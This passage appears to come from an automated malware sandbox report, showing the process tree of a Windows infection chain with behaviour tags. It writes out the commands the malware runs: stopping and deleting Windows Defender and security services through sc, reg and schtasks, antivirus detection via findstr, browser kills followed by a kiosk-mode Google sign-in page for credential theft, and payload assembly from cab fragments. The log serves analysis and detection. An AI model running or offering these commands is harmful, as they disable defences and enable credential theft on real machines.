                                                                                                            • Launches sc.exe
                                                                                                            PID:1168
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                                                                                                            11⤵
                                                                                                              PID:396
                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                              sc stop "MDCoreSvc"
                                                                                                              11⤵
                                                                                                              • Launches sc.exe
                                                                                                              PID:2368
                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                              sc delete "MDCoreSvc"
                                                                                                              11⤵
                                                                                                              • Launches sc.exe
                                                                                                              PID:564
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                                                                                                              11⤵
                                                                                                                PID:3936
                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                sc stop "WdNisSvc"
                                                                                                                11⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:2128
                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                sc delete "WdNisSvc"
                                                                                                                11⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:1952
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                                                                                                                11⤵
                                                                                                                  PID:2264
                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                  sc stop "Sense"
                                                                                                                  11⤵
                                                                                                                  • Launches sc.exe
                                                                                                                  PID:1892
                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                  sc delete "Sense"
                                                                                                                  11⤵
                                                                                                                  • Launches sc.exe
                                                                                                                  PID:4524
                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                  reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                                                                                                                  11⤵
                                                                                                                    PID:3444
                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                    sc stop "wscsvc"
                                                                                                                    11⤵
                                                                                                                    • Launches sc.exe
                                                                                                                    PID:1964
                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                    sc delete "wscsvc"
                                                                                                                    11⤵
                                                                                                                    • Launches sc.exe
                                                                                                                    PID:1176
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                                                                                                    11⤵
                                                                                                                    • Modifies security service
                                                                                                                    PID:5060
                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                    sc stop "SgrmBroker"
                                                                                                                    11⤵
                                                                                                                    • Launches sc.exe
                                                                                                                    PID:1220
                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                    sc delete "SgrmBroker"
                                                                                                                    11⤵
                                                                                                                    • Launches sc.exe
                                                                                                                    PID:4592
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                                                                                                    11⤵
                                                                                                                      PID:3324
                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                      sc stop "SecurityHealthService"
                                                                                                                      11⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:5004
                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                      sc delete "SecurityHealthService"
                                                                                                                      11⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:4120
                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                      reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                                                                                                      11⤵
                                                                                                                        PID:1468
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        sc stop "webthreatdefsvc"
                                                                                                                        11⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:4036
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        sc delete "webthreatdefsvc"
                                                                                                                        11⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:4004
                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                                                                                                        11⤵
                                                                                                                          PID:4124
                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                          sc stop "webthreatdefusersvc"
                                                                                                                          11⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:4920
                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                          sc delete "webthreatdefusersvc"
                                                                                                                          11⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:1892
                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                          reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                                                                                                          11⤵
                                                                                                                            PID:4820
                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                            sc stop "WdNisDrv"
                                                                                                                            11⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            PID:2836
                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                            sc delete "WdNisDrv"
                                                                                                                            11⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            PID:4964
                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                            reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                                                                                                            11⤵
                                                                                                                              PID:3580
                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                              sc stop "WdBoot"
                                                                                                                              11⤵
                                                                                                                              • Launches sc.exe
                                                                                                                              PID:5060
                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                              sc delete "WdBoot"
                                                                                                                              11⤵
                                                                                                                              • Launches sc.exe
                                                                                                                              PID:2716
                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                              reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                                                                                                              11⤵
                                                                                                                                PID:1356
                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                sc stop "WdFilter"
                                                                                                                                11⤵
                                                                                                                                • Launches sc.exe
                                                                                                                                PID:3308
                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                sc delete "WdFilter"
                                                                                                                                11⤵
                                                                                                                                • Launches sc.exe
                                                                                                                                PID:4332
                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                                                                                                                11⤵
                                                                                                                                  PID:3324
                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                  sc stop "SgrmAgent"
                                                                                                                                  11⤵
                                                                                                                                  • Launches sc.exe
                                                                                                                                  PID:1168
                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                  sc delete "SgrmAgent"
                                                                                                                                  11⤵
                                                                                                                                  • Launches sc.exe
                                                                                                                                  PID:3316
                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                  reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                                                                                                                  11⤵
                                                                                                                                    PID:3728
                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                    sc stop "MsSecWfp"
                                                                                                                                    11⤵
                                                                                                                                    • Launches sc.exe
                                                                                                                                    PID:4428
                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                    sc delete "MsSecWfp"
                                                                                                                                    11⤵
                                                                                                                                    • Launches sc.exe
                                                                                                                                    PID:2128
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                                                                                                    11⤵
                                                                                                                                      PID:4776
                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                      sc stop "MsSecFlt"
                                                                                                                                      11⤵
                                                                                                                                      • Launches sc.exe
                                                                                                                                      PID:4516
                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                      sc delete "MsSecFlt"
                                                                                                                                      11⤵
                                                                                                                                      • Launches sc.exe
                                                                                                                                      PID:2264
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                                                                                                      11⤵
                                                                                                                                        PID:3908
                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                        sc stop "MsSecCore"
                                                                                                                                        11⤵
                                                                                                                                        • Launches sc.exe
                                                                                                                                        PID:564
                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                        sc delete "MsSecCore"
                                                                                                                                        11⤵
                                                                                                                                        • Launches sc.exe
                                                                                                                                        PID:4480
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                                                                                                        11⤵
                                                                                                                                          PID:4896
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                                                                                                          11⤵
                                                                                                                                            PID:64
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                                                                                                            11⤵
                                                                                                                                              PID:4928
                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                              schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                                                                                                              11⤵
                                                                                                                                                PID:2112
                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                                                                                                                11⤵
                                                                                                                                                  PID:1352
                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                  sc stop ddrver
                                                                                                                                                  11⤵
                                                                                                                                                  • Launches sc.exe
                                                                                                                                                  PID:4824
                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                  sc delete ddrver
                                                                                                                                                  11⤵
                                                                                                                                                  • Launches sc.exe
                                                                                                                                                  PID:3064
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10413580101\dfcd326586.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10413580101\dfcd326586.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        PID:2816
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10413580101\dfcd326586.exe"
                                                                                                                                          7⤵
                                                                                                                                          • Downloads MZ/PE file
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:1880
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10413590101\cbd92ddfcd.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10413590101\cbd92ddfcd.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        PID:2652
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10413590101\cbd92ddfcd.exe"
                                                                                                                                          7⤵
                                                                                                                                          • Downloads MZ/PE file
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:4868
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10413600101\0cd1fd0334.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10413600101\0cd1fd0334.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        PID:3980
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10413610101\3920945a8f.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10413610101\3920945a8f.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Downloads MZ/PE file
                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                        • Checks computer location settings
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Checks processor information in registry
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        PID:6076
                                                                                                                                        • C:\Users\Admin\AppData\Local\k3ItBwsbMMif.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\k3ItBwsbMMif.exe"
                                                                                                                                          7⤵
                                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Identifies Wine through registry keys
                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          PID:5528
                                                                                                                                        • C:\Users\Admin\AppData\Local\ZlYtF3sUGIlu.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\ZlYtF3sUGIlu.exe"
                                                                                                                                          7⤵
                                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Identifies Wine through registry keys
                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          PID:1660
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10413620101\cce8e9e843.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10413620101\cce8e9e843.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                        PID:5708
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          taskkill /F /IM firefox.exe /T
                                                                                                                                          7⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:5912
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          taskkill /F /IM chrome.exe /T
                                                                                                                                          7⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:5128
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          taskkill /F /IM msedge.exe /T
                                                                                                                                          7⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:2032
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          taskkill /F /IM opera.exe /T
                                                                                                                                          7⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:5668
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          taskkill /F /IM brave.exe /T
                                                                                                                                          7⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:6032
                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                                                          7⤵
                                                                                                                                            PID:6000
                                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                                                              8⤵
                                                                                                                                              • Checks processor information in registry
                                                                                                                                              • Modifies registry class
                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                              PID:5672
                                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1996 -prefsLen 27099 -prefMapHandle 2000 -prefMapSize 270279 -ipcHandle 2076 -initialChannelId {05cfddda-3b1a-47f8-afd8-d65e60cb068f} -parentPid 5672 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5672" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                                                                                                                9⤵
                                                                                                                                                  PID:5216
                                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2476 -prefsLen 27135 -prefMapHandle 2480 -prefMapSize 270279 -ipcHandle 2496 -initialChannelId {bafad156-7cb6-48af-b79a-020156f5370a} -parentPid 5672 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5672" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                                                                                                                  9⤵
                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                  PID:5868
                                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3840 -prefsLen 25164 -prefMapHandle 3844 -prefMapSize 270279 -jsInitHandle 3848 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3856 -initialChannelId {f5af1a2e-3a64-4348-b875-5959aaa2cd8d} -parentPid 5672 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5672" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                                                                                                                  9⤵
                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                  PID:4536
                                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4004 -prefsLen 27276 -prefMapHandle 4008 -prefMapSize 270279 -ipcHandle 4092 -initialChannelId {f6d5b8a0-5ccb-4fd5-a367-81291e8392bd} -parentPid 5672 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5672" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                                                                                                                  9⤵
                                                                                                                                                    PID:3556
                                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2660 -prefsLen 34775 -prefMapHandle 2796 -prefMapSize 270279 -jsInitHandle 4384 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3728 -initialChannelId {e67fa196-e15e-4706-befe-0ea3920fe672} -parentPid 5672 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5672" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                                                                                                                    9⤵
                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                    PID:5724
                                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5028 -prefsLen 35012 -prefMapHandle 5020 -prefMapSize 270279 -ipcHandle 5000 -initialChannelId {9fd5e597-1f1b-414e-9296-dd6b53bdab65} -parentPid 5672 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5672" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                                                                                                                    9⤵
                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                    PID:6640
                                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5164 -prefsLen 32952 -prefMapHandle 5168 -prefMapSize 270279 -jsInitHandle 5172 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5180 -initialChannelId {deebbb80-c315-46dc-9c49-7baa90b0aba1} -parentPid 5672 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5672" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                                                                                                                    9⤵
                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                    PID:6656
                                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5432 -prefsLen 32952 -prefMapHandle 5436 -prefMapSize 270279 -jsInitHandle 5440 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5448 -initialChannelId {44ad1eda-fc53-42e8-b492-92e6a35fa005} -parentPid 5672 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5672" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                                                                                                                    9⤵
                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                    PID:6672
                                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5624 -prefsLen 32952 -prefMapHandle 5628 -prefMapSize 270279 -jsInitHandle 5632 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5640 -initialChannelId {930f8bb1-931b-487c-9b60-80a7ce2742bb} -parentPid 5672 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5672" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                                                                                                                    9⤵
                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                    PID:6688
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413630101\bb3d1872c3.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10413630101\bb3d1872c3.exe"
                                                                                                                                              6⤵
                                                                                                                                              • Modifies Windows Defender DisableAntiSpyware settings
                                                                                                                                              • Modifies Windows Defender Real-time Protection settings
                                                                                                                                              • Modifies Windows Defender TamperProtection settings
                                                                                                                                              • Modifies Windows Defender notification settings
                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                              • Windows security modification
                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              PID:2564
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413640101\790ec5fac7.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10413640101\790ec5fac7.exe"
                                                                                                                                              6⤵
                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                              • Writes to the Master Boot Record (MBR)
                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              PID:6040
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413650101\HAe88WC.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10413650101\HAe88WC.exe"
                                                                                                                                              6⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                              PID:6452
                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                7⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                PID:1076
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413660101\h8NlU62.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10413660101\h8NlU62.exe"
                                                                                                                                              6⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                              PID:5428
                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                7⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:4428
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413670101\XOPPRUc.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10413670101\XOPPRUc.exe"
                                                                                                                                              6⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                              PID:5448
                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                7⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:5232
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413680101\7IIl2eE.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10413680101\7IIl2eE.exe"
                                                                                                                                              6⤵
                                                                                                                                              • Checks computer location settings
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Drops file in Windows directory
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:2944
                                                                                                                                              • C:\Windows\SysWOW64\CMD.exe
                                                                                                                                                "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                                                                                                                                7⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:6292
                                                                                                                                                • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                  tasklist
                                                                                                                                                  8⤵
                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:6076
                                                                                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                  findstr /I "opssvc wrsa"
                                                                                                                                                  8⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:6584
                                                                                                                                                • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                  tasklist
                                                                                                                                                  8⤵
                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:6544
                                                                                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                  findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                                                                                                                  8⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:3728
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  cmd /c md 418377
                                                                                                                                                  8⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:7052
                                                                                                                                                • C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                  extrac32 /Y /E Leon.cab
                                                                                                                                                  8⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:5996
                                                                                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                  findstr /V "BEVERAGES" Compilation
                                                                                                                                                  8⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:1384
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
                                                                                                                                                  8⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:6916
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
                                                                                                                                                  8⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:7076
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
                                                                                                                                                  Passwords.com N
                                                                                                                                                  8⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • Suspicious use of FindShellTrayWindow
